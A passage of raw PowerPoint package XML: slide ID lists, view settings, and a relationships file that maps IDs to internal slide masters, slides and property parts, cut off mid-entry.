    <p:sldId id="387" r:id="rId384"/>
    <p:sldId id="388" r:id="rId385"/>
    <p:sldId id="389" r:id="rId386"/>
    <p:sldId id="390" r:id="rId387"/>
    <p:sldId id="391" r:id="rId388"/>
    <p:sldId id="392" r:id="rId389"/>
    <p:sldId id="393" r:id="rId390"/>
    <p:sldId id="394" r:id="rId391"/>
    <p:sldId id="395" r:id="rId392"/>
    <p:sldId id="396" r:id="rId393"/>
    <p:sldId id="397" r:id="rId394"/>
    <p:sldId id="398" r:id="rId395"/>
    <p:sldId id="399" r:id="rId396"/>
    <p:sldId id="400" r:id="rId397"/>
    <p:sldId id="401" r:id="rId398"/>
    <p:sldId id="402" r:id="rId399"/>
    <p:sldId id="403" r:id="rId400"/>
    <p:sldId id="404" r:id="rId401"/>
    <p:sldId id="405" r:id="rId402"/>
    <p:sldId id="406" r:id="rId403"/>
    <p:sldId id="407" r:id="rId404"/>
    <p:sldId id="408" r:id="rId405"/>
    <p:sldId id="409" r:id="rId406"/>
    <p:sldId id="410" r:id="rId407"/>
    <p:sldId id="411" r:id="rId408"/>
    <p:sldId id="412" r:id="rId409"/>
    <p:sldId id="413" r:id="rId410"/>
    <p:sldId id="414" r:id="rId411"/>
    <p:sldId id="415" r:id="rId412"/>
    <p:sldId id="416" r:id="rId413"/>
    <p:sldId id="417" r:id="rId414"/>
    <p:sldId id="418" r:id="rId415"/>
    <p:sldId id="419" r:id="rId416"/>
    <p:sldId id="420" r:id="rId417"/>
    <p:sldId id="421" r:id="rId418"/>
    <p:sldId id="422" r:id="rId419"/>
    <p:sldId id="423" r:id="rId420"/>
    <p:sldId id="424" r:id="rId421"/>
    <p:sldId id="425" r:id="rId422"/>
    <p:sldId id="426" r:id="rId423"/>
    <p:sldId id="427" r:id="rId424"/>
    <p:sldId id="428" r:id="rId425"/>
    <p:sldId id="429" r:id="rId426"/>
    <p:sldId id="430" r:id="rId427"/>
    <p:sldId id="431" r:id="rId428"/>
    <p:sldId id="432" r:id="rId429"/>
    <p:sldId id="433" r:id="rId430"/>
    <p:sldId id="434" r:id="rId431"/>
    <p:sldId id="435" r:id="rId432"/>
    <p:sldId id="436" r:id="rId433"/>
    <p:sldId id="437" r:id="rId434"/>
    <p:sldId id="438" r:id="rId435"/>
    <p:sldId id="439" r:id="rId436"/>
    <p:sldId id="440" r:id="rId437"/>
    <p:sldId id="441" r:id="rId438"/>
    <p:sldId id="442" r:id="rId439"/>
    <p:sldId id="443" r:id="rId440"/>
    <p:sldId id="444" r:id="rId441"/>
    <p:sldId id="445" r:id="rId442"/>
    <p:sldId id="446" r:id="rId443"/>
    <p:sldId id="447" r:id="rId444"/>
    <p:sldId id="448" r:id="rId445"/>
    <p:sldId id="449" r:id="rId446"/>
    <p:sldId id="450" r:id="rId447"/>
    <p:sldId id="451" r:id="rId448"/>
    <p:sldId id="452" r:id="rId449"/>
    <p:sldId id="453" r:id="rId450"/>
    <p:sldId id="454" r:id="rId451"/>
    <p:sldId id="455" r:id="rId452"/>
    <p:sldId id="456" r:id="rId453"/>
    <p:sldId id="457" r:id="rId454"/>
    <p:sldId id="458" r:id="rId455"/>
    <p:sldId id="459" r:id="rId456"/>
    <p:sldId id="460" r:id="rId457"/>
    <p:sldId id="461" r:id="rId458"/>
    <p:sldId id="462" r:id="rId459"/>
    <p:sldId id="463" r:id="rId460"/>
    <p:sldId id="464" r:id="rId461"/>
    <p:sldId id="465" r:id="rId462"/>
    <p:sldId id="466" r:id="rId463"/>
    <p:sldId id="467" r:id="rId464"/>
    <p:sldId id="468" r:id="rId465"/>
    <p:sldId id="469" r:id="rId466"/>
    <p:sldId id="470" r:id="rId467"/>
    <p:sldId id="471" r:id="rId468"/>
    <p:sldId id="472" r:id="rId469"/>
    <p:sldId id="473" r:id="rId470"/>
    <p:sldId id="474" r:id="rId471"/>
    <p:sldId id="475" r:id="rId472"/>
    <p:sldId id="476" r:id="rId473"/>
    <p:sldId id="477" r:id="rId474"/>
    <p:sldId id="478" r:id="rId475"/>
    <p:sldId id="479" r:id="rId476"/>
    <p:sldId id="480" r:id="rId477"/>
    <p:sldId id="481" r:id="rId478"/>
    <p:sldId id="482" r:id="rId479"/>
    <p:sldId id="483" r:id="rId480"/>
    <p:sldId id="484" r:id="rId481"/>
    <p:sldId id="485" r:id="rId482"/>
    <p:sldId id="486" r:id="rId483"/>
    <p:sldId id="487" r:id="rId484"/>
    <p:sldId id="488" r:id="rId485"/>
    <p:sldId id="489" r:id="rId486"/>
    <p:sldId id="490" r:id="rId487"/>
    <p:sldId id="491" r:id="rId488"/>
    <p:sldId id="492" r:id="rId489"/>
    <p:sldId id="493" r:id="rId490"/>
    <p:sldId id="494" r:id="rId491"/>
    <p:sldId id="495" r:id="rId492"/>
    <p:sldId id="496" r:id="rId493"/>
    <p:sldId id="497" r:id="rId494"/>
    <p:sldId id="498" r:id="rId495"/>
    <p:sldId id="499" r:id="rId496"/>
    <p:sldId id="500" r:id="rId497"/>
    <p:sldId id="501" r:id="rId498"/>
    <p:sldId id="502" r:id="rId499"/>
    <p:sldId id="503" r:id="rId500"/>
    <p:sldId id="504" r:id="rId501"/>
    <p:sldId id="505" r:id="rId502"/>
    <p:sldId id="506" r:id="rId503"/>
    <p:sldId id="507" r:id="rId504"/>
    <p:sldId id="508" r:id="rId505"/>
    <p:sldId id="509" r:id="rId506"/>
    <p:sldId id="510" r:id="rId507"/>
    <p:sldId id="511" r:id="rId508"/>
    <p:sldId id="512" r:id="rId509"/>
    <p:sldId id="513" r:id="rId510"/>
    <p:sldId id="514" r:id="rId511"/>
    <p:sldId id="515" r:id="rId512"/>
    <p:sldId id="516" r:id="rId513"/>
    <p:sldId id="517" r:id="rId514"/>
    <p:sldId id="518" r:id="rId515"/>
    <p:sldId id="519" r:id="rId516"/>
    <p:sldId id="520" r:id="rId517"/>
    <p:sldId id="521" r:id="rId518"/>
    <p:sldId id="522" r:id="rId519"/>
    <p:sldId id="523" r:id="rId520"/>
    <p:sldId id="524" r:id="rId521"/>
    <p:sldId id="525" r:id="rId522"/>
    <p:sldId id="526" r:id="rId523"/>
    <p:sldId id="527" r:id="rId524"/>
    <p:sldId id="528" r:id="rId525"/>
    <p:sldId id="529" r:id="rId526"/>
    <p:sldId id="530" r:id="rId527"/>
    <p:sldId id="531" r:id="rId528"/>
    <p:sldId id="532" r:id="rId529"/>
    <p:sldId id="533" r:id="rId530"/>
    <p:sldId id="534" r:id="rId531"/>
    <p:sldId id="535" r:id="rId532"/>
    <p:sldId id="536" r:id="rId533"/>
    <p:sldId id="537" r:id="rId534"/>
    <p:sldId id="538" r:id="rId535"/>
    <p:sldId id="539" r:id="rId536"/>
    <p:sldId id="540" r:id="rId537"/>
    <p:sldId id="541" r:id="rId538"/>
    <p:sldId id="542" r:id="rId539"/>
    <p:sldId id="543" r:id="rId540"/>
    <p:sldId id="544" r:id="rId541"/>
    <p:sldId id="545" r:id="rId542"/>
    <p:sldId id="546" r:id="rId543"/>
    <p:sldId id="547" r:id="rId544"/>
    <p:sldId id="548" r:id="rId545"/>
    <p:sldId id="549" r:id="rId546"/>
    <p:sldId id="550" r:id="rId547"/>
    <p:sldId id="551" r:id="rId548"/>
    <p:sldId id="552" r:id="rId549"/>
    <p:sldId id="553" r:id="rId550"/>
    <p:sldId id="554" r:id="rId551"/>
    <p:sldId id="555" r:id="rId552"/>
    <p:sldId id="556" r:id="rId553"/>
    <p:sldId id="557" r:id="rId554"/>
    <p:sldId id="558" r:id="rId555"/>
    <p:sldId id="559" r:id="rId556"/>
    <p:sldId id="560" r:id="rId557"/>
    <p:sldId id="561" r:id="rId558"/>
    <p:sldId id="562" r:id="rId559"/>
    <p:sldId id="563" r:id="rId560"/>
    <p:sldId id="564" r:id="rId561"/>
    <p:sldId id="565" r:id="rId562"/>
    <p:sldId id="566" r:id="rId563"/>
    <p:sldId id="567" r:id="rId564"/>
    <p:sldId id="568" r:id="rId565"/>
    <p:sldId id="569" r:id="rId566"/>
    <p:sldId id="570" r:id="rId567"/>
    <p:sldId id="571" r:id="rId568"/>
    <p:sldId id="572" r:id="rId569"/>
    <p:sldId id="573" r:id="rId570"/>
    <p:sldId id="574" r:id="rId571"/>
    <p:sldId id="575" r:id="rId572"/>
    <p:sldId id="576" r:id="rId573"/>
    <p:sldId id="577" r:id="rId574"/>
    <p:sldId id="578" r:id="rId575"/>
    <p:sldId id="579" r:id="rId576"/>
    <p:sldId id="580" r:id="rId577"/>
    <p:sldId id="581" r:id="rId578"/>
    <p:sldId id="582" r:id="rId579"/>
    <p:sldId id="583" r:id="rId580"/>
    <p:sldId id="584" r:id="rId581"/>
    <p:sldId id="585" r:id="rId582"/>
    <p:sldId id="586" r:id="rId583"/>
    <p:sldId id="587" r:id="rId584"/>
    <p:sldId id="588" r:id="rId585"/>
    <p:sldId id="589" r:id="rId586"/>
    <p:sldId id="590" r:id="rId587"/>
    <p:sldId id="591" r:id="rId588"/>
    <p:sldId id="592" r:id="rId589"/>
    <p:sldId id="593" r:id="rId590"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="7103745" cy="10234295"/>
  <p:custDataLst>
    <p:tags r:id="rId595"/>
  </p:custDataLst>
  <p:defaultTex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2198" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="3840" userDrawn="1">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0657CF"/>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15987" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="50" d="100"/>
          <a:sy n="50" d="100"/>
        </p:scale>
        <p:origin x="-396" y="-1758"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2198"/>
        <p:guide pos="3840"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="139" d="100"/>
        <a:sy n="139" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:gridSpacing cx="72008" cy="72008"/>
</p:viewPr>
</file>

<file path=ppt/_rels/presentation.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster98.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster97.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster96.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster95.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster94.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster93.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster92.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster91.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster90.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster89.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster8.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster88.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster87.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster86.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster85.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster84.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster83.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster82.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster81.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster80.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster79.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster7.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster78.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster77.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster76.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster75.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster74.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster73.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster72.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster71.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster70.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster69.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster6.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster68.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster67.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster66.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster65.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster64.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster63.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster62.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster61.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster60.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster59.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster5.xml"/><Relationship Id="rId595" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag1176.xml"/><Relationship Id="rId594" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId593" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId592" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId591" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/handoutMaster" Target="handoutMasters/handoutMaster1.xml"/><Relationship Id="rId590" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide302.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster58.xml"/><Relationship Id="rId589" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide301.xml"/><Relationship Id="rId588" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide300.xml"/><Relationship Id="rId587" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide299.xml"/><Relationship Id="rId586" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide298.xml"/><Relationship Id="rId585" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide297.xml"/><Relationship Id="rId584" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide296.xml"/><Relationship Id="rId583" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide295.xml"/><Relationship Id="rId582" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide294.xml"/><Relationship Id="rId581" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide293.xml"/><Relationship Id="rId580" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide292.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster57.xml"/><Relationship Id="rId579" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide291.xml"/><Relationship Id="rId578" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide290.xml"/><Relationship Id="rId577" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide289.xml"/><Relationship Id="rId576" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide288.xml"/><Relationship Id="rId575" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide287.xml"/><Relationship Id="rId574" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide286.xml"/><Relationship Id="rId573" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide285.xml"/><Relationship Id="rId572" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide284.xml"/><Relationship Id="rId571" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide283.xml"/><Relationship Id="rId570" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide282.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster56.xml"/><Relationship Id="rId569" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide281.xml"/><Relationship Id="rId568" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide280.xml"/><Relationship Id="rId567" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide279.xml"/><Relationship Id="rId566" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide278.xml"/><Relationship Id="rId565" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide277.xml"/><Relationship Id="rId564" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide276.xml"/><Relationship Id="rId563" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide275.xml"/><Relationship Id="rId562" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide274.xml"/><Relationship Id="rId561" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide273.xml"/><Relationship Id="rId560" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide272.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster55.xml"/><Relationship Id="rId559" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide271.xml"/><Relationship Id="rId558" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide270.xml"/><Relationship Id="rId557" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide269.xml"/><Relationship Id="rId556" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide268.xml"/><Relationship Id="rId555" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide267.xml"/><Relationship Id="rId554" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide266.xml"/><Relationship Id="rId553" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide265.xml"/><Relationship Id="rId552" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide264.xml"/><Relationship Id="rId551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide263.xml"/><Relationship Id="rId550" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide262.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster54.xml"/><Relationship Id="rId549" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide261.xml"/><Relationship Id="rId548" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide260.xml"/><Relationship Id="rId547" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide259.xml"/><Relationship Id="rId546" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide258.xml"/><Relationship Id="rId545" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide257.xml"/><Relationship Id="rId544" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide256.xml"/><Relationship Id="rId543" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide255.xml"/><Relationship Id="rId542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide254.xml"/><Relationship Id="rId541" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide253.xml"/><Relationship Id="rId540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide252.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster53.xml"/><Relationship Id="rId539" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide251.xml"/><Relationship Id="rId538" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide250.xml"/><Relationship Id="rId537" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide249.xml"/><Relationship Id="rId536" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide248.xml"/><Relationship Id="rId535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide247.xml"/><Relationship Id="rId534" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide246.xml"/><Relationship Id="rId533" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide245.xml"/><Relationship Id="rId532" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide244.xml"/><Relationship Id="rId531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide243.xml"/><Relationship Id="rId530" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide242.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster52.xml"/><Relationship Id="rId529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide241.xml"/><Relationship Id="rId528" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide240.xml"/><Relationship Id="rId527" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide239.xml"/><Relationship Id="rId526" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide238.xml"/><Relationship Id="rId525" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide237.xml"/><Relationship Id="rId524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide236.xml"/><Relationship Id="rId523" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide235.xml"/><Relationship Id="rId522" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide234.xml"/><Relationship Id="rId521" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide233.xml"/><Relationship Id="rId520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide232.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster51.xml"/><Relationship Id="rId519" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide231.xml"/><Relationship Id="rId518" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide230.xml"/><Relationship Id="rId517" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide229.xml"/><Relationship Id="rId516" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide228.xml"/><Relationship Id="rId515" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide227.xml"/><Relationship Id="rId514" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide226.xml"/><Relationship Id="rId513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide225.xml"/><Relationship Id="rId512" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide224.xml"/><Relationship Id="rId511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide223.xml"/><Relationship Id="rId510" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide222.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster50.xml"/><Relationship Id="rId509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide221.xml"/><Relationship Id="rId508" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide220.xml"/><Relationship Id="rId507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide219.xml"/><Relationship Id="rId506" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide218.xml"/><Relationship Id="rId505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide217.xml"/><Relationship Id="rId504" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide216.xml"/><Relationship Id="rId503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide215.xml"/><Relationship Id="rId502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide214.xml"/><Relationship Id="rId501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide213.xml"/><Relationship Id="rId500" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide212.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster49.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster4.xml"/><Relationship Id="rId499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" 